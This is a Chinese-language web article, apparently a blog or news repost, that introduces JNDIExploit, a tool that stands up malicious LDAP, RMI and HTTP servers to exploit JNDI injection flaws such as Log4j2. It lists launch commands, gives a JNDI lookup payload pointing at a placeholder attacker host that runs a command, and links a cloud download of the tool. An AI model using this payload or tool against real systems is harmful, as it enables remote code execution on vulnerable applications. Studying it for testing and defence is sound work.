当前位置: 首页 > news >正文

JNDIExploit 工具详解

0x01 JNDIExploit 是什么

JNDIExploit 是一款用于 JNDI 注入漏洞利用与验证 的 Java 攻击辅助工具,常见版本如 JNDIExploit-1.x-SNAPSHOT-all.jar。该工具通过快速搭建 LDAP / RMI / HTTP 等恶意 JNDI 服务,在目标应用触发 JNDI Lookup 时向其返回可控引用,从而实现 远程类加载、反序列化执行或命令执行。

0x02 JDNIExploit 解决的核心问题

在不深入理解 JNDI 底层实现的情况下,快速完成 JNDI 注入漏洞的利用验证。具体体现在:
1.JNDI 服务搭建成本高:手动配置 LDAP、RMI、HTTP 服务复杂。
2.漏洞复现效率低:需要反复调整返回内容和协议细节。
3.攻击链整合困难:JNDI、反序列化、命令执行工具割裂。
4.新手门槛高:JNDI 协议细节难以快速掌握。

0x03 JNDIExploit 整体架构

可以概括为"多协议统一入口 + 利用方式参数化"
1.内置多种 JNDI 服务实现(LDAP / RMI / HTTP)。
2.统一启动入口,通过参数控制利用方式。
3.返回内容高度可控,支持命令执行、类加载、反序列化。
4.与 ysoserial 解耦但可联动,可直接承载序列化 payload。
在攻击链中,JNDIExploit 承担的是:JNDI Lookup 的响应者 + 利用载荷的分发者。

0x04 JNDIExploit 的主要模块

LDAP 服务模块

  • 用途:最常见的 JNDI 注入触发协议
  • 功能:返回恶意 Reference 或序列化对象
  • 典型漏洞:Log4j2、Spring JNDI 注入

RMI 服务模块

  • 用途:传统 JNDI 攻击方式
  • 功能:远程对象绑定与反序列化触发
  • 适用场景:旧版 JDK / 未限制 RMI 的环境

HTTP 代码托管模块

  • 用途:远程类加载
  • 功能:提供 .class 文件下载
  • 前提:目标 JDK 允许远程 codebase

命令执行载荷模块

  • 功能:直接返回触发 Runtime.exec 的对象
  • 特点:不依赖外部 ysoserial 即可执行

0x05 JNDIExploit 全模块命令

//启动 JNDIExploit 服务
java -jar JNDIExploit-1.2-SNAPSHOT-all.jar
//指定端口与利用方式
java -jar JNDIExploit-1.2-SNAPSHOT-all.jar -i 0.0.0.0 -p 1389
//典型 JNDI 注入 payload
${jndi:ldap://attacker_ip:1389/Basic/Command/whoami}

0x06 工具下载

链接:https://pan.quark.cn/s/a6f286514469
提取码:hxdM

http://www.jsqmd.com/news/267115/

相关文章:

  • 终极指南:Open 3D Model Viewer - 免费全能3D模型解析工具
  • 群晖Audio Station歌词插件完全配置指南
  • redis 进阶 - 内存优化
  • 关于行为树可视化插件BehaviorDesigner
  • web入门121-130
  • C++各数据类型的内存和范围
  • 基于ssm+vue的学习空间服务平台[ssm]-计算机毕业设计源码+LW文档
  • EVCC EEBus智能充电:解锁家庭能源管理新境界
  • 基于python的电子商务购物商城系统设计与实现 协同过滤算法 多商家 会员折扣 积分兑换
  • 基于ssm+vue的网上代驾调度平台[ssm]-计算机毕业设计源码+LW文档
  • TrollInstallerX终极安装手册:iOS 14-16系统免越狱应用部署实战指南
  • 如何让每次OBS直播都像电影大片:StreamFX特效插件5分钟上手指南
  • Frigate开源监控系统:智能家庭安防的终极指南
  • 【Linalg】ElementwiseOpFusion 中其他优化模式技术分析
  • 【2026】 LLM 大模型系统学习指南 (5)
  • 重塑音乐体验:探索新一代插件管理器的无限可能
  • 【2026】 LLM 大模型系统学习指南 (6)
  • 2026年十大灵活用工平台排行榜,品为灵工(品为企服)拔得头筹 - 华Sir1
  • 原圈科技领衔2026AI市场分析榜单,助您告别信息焦虑与无效获客
  • 全网首推!154 页 RAG 实战手册,从基础入门到独立搭建RAG,全程干货,无废话!
  • 2026年梳理系统门窗招商加盟,山西科典优势在哪 - 工业品牌热点
  • ESP-01系列
  • 2026年全国灵活用工十大平台综合盘点:合规、稳定与效能如何兼得 - 华Sir1
  • 2026年十大灵活用工平台推荐:强合规、高实用,助力企业高效用工 - 华Sir1
  • 【飞腾平台实时Linux方案系列】第十二篇 - 飞腾平台实时Linux低功耗优化实践。
  • 重构微型泵版图:2026高性价比替代进口微型磁力泵厂家推荐 - 品牌2026
  • 【飞腾平台实时Linux方案系列】第十三篇 - 飞腾平台实时Linux中断优化与硬实时保障。
  • RimSort:彻底解决RimWorld模组管理难题的终极工具
  • composer报错:安装依赖需要输入token的情况
  • 【飞腾平台实时Linux方案系列】第十四篇 - 飞腾平台实时Linux远程运维与监控方案。